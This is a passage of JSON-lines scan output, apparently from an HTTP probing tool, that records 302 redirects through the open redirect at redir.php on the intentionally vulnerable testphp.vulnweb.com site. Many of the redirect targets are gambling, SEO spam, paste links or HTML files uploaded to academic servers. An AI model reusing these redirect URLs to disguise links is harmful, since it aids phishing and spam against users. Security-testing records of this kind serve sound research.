:1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:59.775827717Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://ocrv.vip/rv-kitchen-repair-near-me\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://ocrv.vip/rv-kitchen-repair-near-me\",\"location\":\"http://ocrv.vip/rv-kitchen-repair-near-me\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://ocrv.vip/rv-kitchen-repair-near-me\",\"time\":\"344.438991ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:01.508270672Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://ocrvcenter.co\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://ocrvcenter.co\",\"location\":\"http://ocrvcenter.co\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://ocrvcenter.co\",\"time\":\"352.819634ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:02.756965546Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://ocrvcenter.com/trailer-mattresses-nearby/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://ocrvcenter.com/trailer-mattresses-nearby/\",\"location\":\"http://ocrvcenter.com/trailer-mattresses-nearby/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://ocrvcenter.com/trailer-mattresses-nearby/\",\"time\":\"343.655194ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:02.804864249Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://ocrvcenter.net/motorhome-body-repair-near-me\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://ocrvcenter.net/motorhome-body-repair-near-me\",\"location\":\"http://ocrvcenter.net/motorhome-body-repair-near-me\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://ocrvcenter.net/motorhome-body-repair-near-me\",\"time\":\"338.884458ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:03.140253201Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://ocrvcenter.net/passenger-bus-collision-repair-paint-shop-near-me-orange-county\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://ocrvcenter.net/passenger-bus-collision-repair-paint-shop-near-me-orange-county\",\"location\":\"http://ocrvcenter.net/passenger-bus-collision-repair-paint-shop-near-me-orange-county\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://ocrvcenter.net/passenger-bus-collision-repair-paint-shop-near-me-orange-county\",\"time\":\"342.96249ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:03.9735831Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://ojs.experttel.com.ar/files/journals/2/articles/427/submission/original/427-525-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://ojs.experttel.com.ar/files/journals/2/articles/427/submission/original/427-525-1-SM.html\",\"location\":\"http://ojs.experttel.com.ar/files/journals/2/articles/427/submission/original/427-525-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://ojs.experttel.com.ar/files/journals/2/articles/427/submission/original/427-525-1-SM.html\",\"time\":\"345.944792ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:03.992125717Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pankajkeyboardplayerin.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pankajkeyboardplayerin.blogspot.com/\",\"location\":\"http://pankajkeyboardplayerin.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pankajkeyboardplayerin.blogspot.com/\",\"time\":\"347.013609ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.052667261Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pankajkeyboardplayerin.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pankajkeyboardplayerin.blogspot.com/management.html\",\"location\":\"http://pankajkeyboardplayerin.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pankajkeyboardplayerin.blogspot.com/management.html\",\"time\":\"347.365591ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.06728294Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pastein.ru/l/WktY\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pastein.ru/l/WktY\",\"location\":\"http://pastein.ru/l/WktY\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pastein.ru/l/WktY\",\"time\":\"346.712387ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.387068594Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://peugeotvc69.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://peugeotvc69.blogspot.com/\",\"location\":\"http://peugeotvc69.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://peugeotvc69.blogspot.com/\",\"time\":\"351.448696ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.431922877Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://peugeotvc69.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://peugeotvc69.blogspot.com/management.html\",\"location\":\"http://peugeotvc69.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://peugeotvc69.blogspot.com/management.html\",\"time\":\"343.03397ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.447359903Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pickachu-web.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pickachu-web.blogspot.com\",\"location\":\"http://pickachu-web.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pickachu-web.blogspot.com\",\"time\":\"352.749122ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.537721607Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pickachu-web.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pickachu-web.blogspot.com/\",\"location\":\"http://pickachu-web.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pickachu-web.blogspot.com/\",\"time\":\"353.223819ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.560234459Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pickachu-web.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pickachu-web.blogspot.com/management.html\",\"location\":\"http://pickachu-web.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pickachu-web.blogspot.com/management.html\",\"time\":\"352.276937ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.65691965Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://plataforma.cesuver.edu.mx/chSecundaria/app/upload/users/4/48/my_files/sv14.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://plataforma.cesuver.edu.mx/chSecundaria/app/upload/users/4/48/my_files/sv14.html\",\"location\":\"http://plataforma.cesuver.edu.mx/chSecundaria/app/upload/users/4/48/my_files/sv14.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://plataforma.cesuver.edu.mx/chSecundaria/app/upload/users/4/48/my_files/sv14.html\",\"time\":\"356.215299ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.7029981Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://plrecenzjefilmowe.wordpress.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://plrecenzjefilmowe.wordpress.com/\",\"location\":\"http://plrecenzjefilmowe.wordpress.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://plrecenzjefilmowe.wordpress.com/\",\"time\":\"351.78297ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.750275134Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://poiuytrewqpoiuyt.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://poiuytrewqpoiuyt.blogspot.com/\",\"location\":\"http://poiuytrewqpoiuyt.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://poiuytrewqpoiuyt.blogspot.com/\",\"time\":\"346.789358ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.824754097Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://poiuytrewqpoiuyt.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://poiuytrewqpoiuyt.blogspot.com/management.html\",\"location\":\"http://poiuytrewqpoiuyt.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://poiuytrewqpoiuyt.blogspot.com/management.html\",\"time\":\"343.737888ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.889839939Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pokeridnjudi.pro/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pokeridnjudi.pro/\",\"location\":\"http://pokeridnjudi.pro/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pokeridnjudi.pro/\",\"time\":\"352.187162ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:04.963290137Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pokeronlinecpe.journalnewsnet.com/bet-365-for-ideas-1968/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pokeronlinecpe.journalnewsnet.com/bet-365-for-ideas-1968/\",\"location\":\"http://pokeronlinecpe.journalnewsnet.com/bet-365-for-ideas-1968/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pokeronlinecpe.journalnewsnet.com/bet-365-for-ideas-1968/\",\"time\":\"356.088193ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:05.073281824Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pokeronlinej42.thedeels.com/predictions-soccer-for-lastupdate-2000/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pokeronlinej42.thedeels.com/predictions-soccer-for-lastupdate-2000/\",\"location\":\"http://pokeronlinej42.thedeels.com/predictions-soccer-for-lastupdate-2000/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pokeronlinej42.thedeels.com/predictions-soccer-for-lastupdate-2000/\",\"time\":\"355.066204ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:08.230512261Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://prkk.org/berita-154-tuhan-menjadi-nyata-dengan-mengasihi.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://prkk.org/berita-154-tuhan-menjadi-nyata-dengan-mengasihi.html\",\"location\":\"http://prkk.org/berita-154-tuhan-menjadi-nyata-dengan-mengasihi.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://prkk.org/berita-154-tuhan-menjadi-nyata-dengan-mengasihi.html\",\"time\":\"352.133375ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:08.435856529Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://promociones-arco.com/15222/winning-is-easy-on-this-wagering-web-site/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://promociones-arco.com/15222/winning-is-easy-on-this-wagering-web-site/\",\"location\":\"http://promociones-arco.com/15222/winning-is-easy-on-this-wagering-web-site/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://promociones-arco.com/15222/winning-is-easy-on-this-wagering-web-site/\",\"time\":\"348.450532ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:08.482227249Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://psychedelicshome.co.uk/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://psychedelicshome.co.uk/\",\"location\":\"http://psychedelicshome.co.uk/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://psychedelicshome.co.uk/\",\"time\":\"346.563647ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:08.530022005Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1465/submission/original/1465-2406-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1465/submission/original/1465-2406-1-SM.html\",\"location\":\"http://publications.lnu.edu.ua/journals/files/journals/8/articles/1465/submission/original/1465-2406-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1465/submission/original/1465-2406-1-SM.html\",\"time\":\"343.262076ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:08.937207246Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1467/submission/original/1467-2409-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1467/submission/original/1467-2409-1-SM.html\",\"location\":\"http://publications.lnu.edu.ua/journals/files/journals/8/articles/1467/submission/original/1467-2409-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1467/submission/original/1467-2409-1-SM.html\",\"time\":\"352.711966ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:09.329521109Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1469/submission/original/1469-2412-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1469/submission/original/1469-2412-1-SM.html\",\"location\":\"http://publications.lnu.edu.ua/journals/files/journals/8/articles/1469/submission/original/1469-2412-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1469/submission/original/1469-2412-1-SM.html\",\"time\":\"349.064957ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:09.36978232Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1471/submission/original/1471-2415-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1471/submission/original/1471-2415-1-SM.html\",\"location\":\"http://publications.lnu.edu.ua/journals/files/journals/8/articles/1471/submission/original/1471-2415-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1471/submission/original/1471-2415-1-SM.html\",\"time\":\"352.429863ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:09.539679429Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1491/submission/original/1491-2461-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1491/submission/original/1491-2461-1-SM.html\",\"location\":\"http://publications.lnu.edu.ua/journals/files/journals/8/articles/1491/submission/original/1491-2461-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1491/submission/original/1491-2461-1-SM.html\",\"time\":\"342.402986ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:10.083995072Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1496/submission/original/1496-2477-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1496/submission/original/1496-2477-1-SM.html\",\"location\":\"http://publications.lnu.edu.ua/journals/files/journals/8/articles/1496/submission/original/1496-2477-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1496/submission/original/1496-2477-1-SM.html\",\"time\":\"344.468058ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:10.12248055Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1499/submission/original/1499-2481-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1499/submission/original/1499-2481-1-SM.html\",\"location\":\"http://publications.lnu.edu.ua/journals/files/journals/8/articles/1499/submission/original/1499-2481-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1499/submission/original/1499-2481-1-SM.html\",\"time\":\"344.433022ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:11.857196442Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1501/submission/original/1501-2484-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1501/submission/original/1501-2484-1-SM.html\",\"location\":\"http://publications.lnu.edu.ua/journals/files/journals/8/articles/1501/submission/original/1501-2484-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1501/submission/original/1501-2484-1-SM.html\",\"time\":\"346.627254ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,